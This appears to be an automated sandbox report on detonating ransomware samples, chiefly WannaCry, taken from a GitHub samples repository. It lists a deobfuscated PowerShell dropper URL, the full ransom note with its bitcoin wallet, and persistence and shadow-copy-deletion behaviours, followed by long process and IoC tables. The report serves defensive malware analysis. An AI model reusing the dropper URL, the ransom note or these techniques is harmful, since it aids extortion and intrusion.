wannacry | hxxps://github[.]com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware[.]Cerber[.]zip

Resubmissions

09-05-2024 20:49

240509-zlz3hshb25 10

09-05-2024 20:44

240509-zjl3wagh48 6

Analysis

max time kernel
515s
max time network
519s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
09-05-2024 20:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://french-cooking.com/myguy.exe

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

40 2924 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2924 powershell.exe

flow	pid	process
40	2924	powershell.exe

pid	process
2924	powershell.exe

Drops startup file 3 IoCs

Processes:

svchost.exeed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD71AA.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD71C1.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 22 IoCs

Processes:

taskdl.exe@[email protected]@[email protected]taskhsvc.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe

pid	process
1588	taskdl.exe
664	@[email protected]
2436	@[email protected]
3492	taskhsvc.exe
2732	taskdl.exe
4556	taskse.exe
3288	@[email protected]
1756	taskdl.exe
4632	taskse.exe
2812	@[email protected]
1412	taskse.exe
2388	@[email protected]
1980	taskdl.exe
4940	taskse.exe
2116	@[email protected]
3680	taskdl.exe
4620	taskse.exe
2528	@[email protected]
4520	taskdl.exe
2088	taskse.exe
3392	@[email protected]
4228	taskdl.exe

Loads dropped DLL 9 IoCs

Processes:

taskhsvc.exe

pid	process
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

840 icacls.exe

pid	process
840	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\czxlscessk897 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_Ransomware.WannaCry.zip\\tasksche.exe\""	reg.exe

Drops desktop.ini file(s) 2 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\assembly\Desktop.ini svchost.exe
File opened for modification C:\Windows\assembly\Desktop.ini svchost.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
29 raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe

flow	ioc
1	raw.githubusercontent.com
29	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 3 IoCs

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\assembly\Desktop.ini	svchost.exe
File opened for modification	C:\Windows\assembly	svchost.exe
File created	C:\Windows\assembly\Desktop.ini	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2388 2436 WerFault.exe @[email protected]
3884 2436 WerFault.exe @[email protected]

pid	pid_target	process	target process
2388	2436	WerFault.exe	@[email protected]
3884	2436	WerFault.exe	@[email protected]

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings msedge.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2444 reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000_Classes\Local Settings	msedge.exe

pid	process
2444	reg.exe

NTFS ADS 11 IoCs

Processes:

msedge.exesvchost.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Petrwrap.zip:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Roaming\svchost.exe\:Zone.Identifier:$DATA	svchost.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.WannaCry (1).zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Thanos.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Jigsaw.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Cerber.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.WannaCry_Plus.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Vipasana.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Petya.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Ransomware.Petya (1).zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 40 IoCs

Processes:

msedge.exemsedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exepowershell.exemsedge.exemsedge.exetaskhsvc.exe

pid	process
484	msedge.exe
484	msedge.exe
2800	msedge.exe
2800	msedge.exe
2552	msedge.exe
2552	msedge.exe
4700	identity_helper.exe
4700	identity_helper.exe
5040	msedge.exe
5040	msedge.exe
4228	msedge.exe
4228	msedge.exe
4228	msedge.exe
4228	msedge.exe
1756	msedge.exe
1756	msedge.exe
3020	msedge.exe
3020	msedge.exe
4896	msedge.exe
4896	msedge.exe
1992	msedge.exe
1992	msedge.exe
4224	msedge.exe
4224	msedge.exe
4344	msedge.exe
4344	msedge.exe
1772	msedge.exe
1772	msedge.exe
2924	powershell.exe
2924	powershell.exe
1236	msedge.exe
1236	msedge.exe
3668	msedge.exe
3668	msedge.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe
3492	taskhsvc.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

@[email protected]

pid process

3288 @[email protected]

pid	process
3288	@[email protected]

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

Processes:

msedge.exe

pid	process
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

Processes:

powershell.exesvchost.exeWMIC.exevssvc.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exetaskse.exe

description	pid	process
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	3124	svchost.exe
Token: 33	3124	svchost.exe
Token: SeIncBasePriorityPrivilege	3124	svchost.exe
Token: SeIncreaseQuotaPrivilege	1516	WMIC.exe
Token: SeSecurityPrivilege	1516	WMIC.exe
Token: SeTakeOwnershipPrivilege	1516	WMIC.exe
Token: SeLoadDriverPrivilege	1516	WMIC.exe
Token: SeSystemProfilePrivilege	1516	WMIC.exe
Token: SeSystemtimePrivilege	1516	WMIC.exe
Token: SeProfSingleProcessPrivilege	1516	WMIC.exe
Token: SeIncBasePriorityPrivilege	1516	WMIC.exe
Token: SeCreatePagefilePrivilege	1516	WMIC.exe
Token: SeBackupPrivilege	1516	WMIC.exe
Token: SeRestorePrivilege	1516	WMIC.exe
Token: SeShutdownPrivilege	1516	WMIC.exe
Token: SeDebugPrivilege	1516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1516	WMIC.exe
Token: SeRemoteShutdownPrivilege	1516	WMIC.exe
Token: SeUndockPrivilege	1516	WMIC.exe
Token: SeManageVolumePrivilege	1516	WMIC.exe
Token: 33	1516	WMIC.exe
Token: 34	1516	WMIC.exe
Token: 35	1516	WMIC.exe
Token: 36	1516	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1516	WMIC.exe
Token: SeSecurityPrivilege	1516	WMIC.exe
Token: SeTakeOwnershipPrivilege	1516	WMIC.exe
Token: SeLoadDriverPrivilege	1516	WMIC.exe
Token: SeSystemProfilePrivilege	1516	WMIC.exe
Token: SeSystemtimePrivilege	1516	WMIC.exe
Token: SeProfSingleProcessPrivilege	1516	WMIC.exe
Token: SeIncBasePriorityPrivilege	1516	WMIC.exe
Token: SeCreatePagefilePrivilege	1516	WMIC.exe
Token: SeBackupPrivilege	1516	WMIC.exe
Token: SeRestorePrivilege	1516	WMIC.exe
Token: SeShutdownPrivilege	1516	WMIC.exe
Token: SeDebugPrivilege	1516	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1516	WMIC.exe
Token: SeRemoteShutdownPrivilege	1516	WMIC.exe
Token: SeUndockPrivilege	1516	WMIC.exe
Token: SeManageVolumePrivilege	1516	WMIC.exe
Token: 33	1516	WMIC.exe
Token: 34	1516	WMIC.exe
Token: 35	1516	WMIC.exe
Token: 36	1516	WMIC.exe
Token: SeBackupPrivilege	1052	vssvc.exe
Token: SeRestorePrivilege	1052	vssvc.exe
Token: SeAuditPrivilege	1052	vssvc.exe
Token: SeTcbPrivilege	4556	taskse.exe
Token: SeTcbPrivilege	4556	taskse.exe
Token: SeTcbPrivilege	4632	taskse.exe
Token: SeTcbPrivilege	4632	taskse.exe
Token: SeTcbPrivilege	1412	taskse.exe
Token: SeTcbPrivilege	1412	taskse.exe
Token: SeTcbPrivilege	4940	taskse.exe
Token: SeTcbPrivilege	4940	taskse.exe
Token: SeTcbPrivilege	4620	taskse.exe
Token: SeTcbPrivilege	4620	taskse.exe
Token: SeTcbPrivilege	2088	taskse.exe
Token: SeTcbPrivilege	2088	taskse.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

msedge.exe

pid	process
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

Processes:

msedge.exe

pid	process
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe
2800	msedge.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]@[email protected]

pid	process
664	@[email protected]
664	@[email protected]
2436	@[email protected]
2436	@[email protected]
3288	@[email protected]
3288	@[email protected]
2812	@[email protected]
2388	@[email protected]
2116	@[email protected]
2528	@[email protected]
3392	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 2800 wrote to memory of 4188	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4188	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 2076	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 484	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 484	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe
PID 2800 wrote to memory of 4788	2800	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

1516 attrib.exe
3424 attrib.exe

pid	process
1516	attrib.exe
3424	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/kh4sh3i/Ransomware-Samples/blob/main/Cerber/Ransomware.Cerber.zip
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa58563cb8,0x7ffa58563cc8,0x7ffa58563cd8
2⤵
PID:4188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
2⤵
PID:2076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
2⤵
PID:4788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
2⤵
PID:4932

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
2⤵
PID:1188

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4700 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2552

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5288 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:1
2⤵
PID:492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
2⤵
PID:3760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
2⤵
PID:4168

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
2⤵
PID:3964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1
2⤵
PID:4956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1712 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
2⤵
PID:4844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1900,4574362348168839089,3680852755822183007,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
2⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:1756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
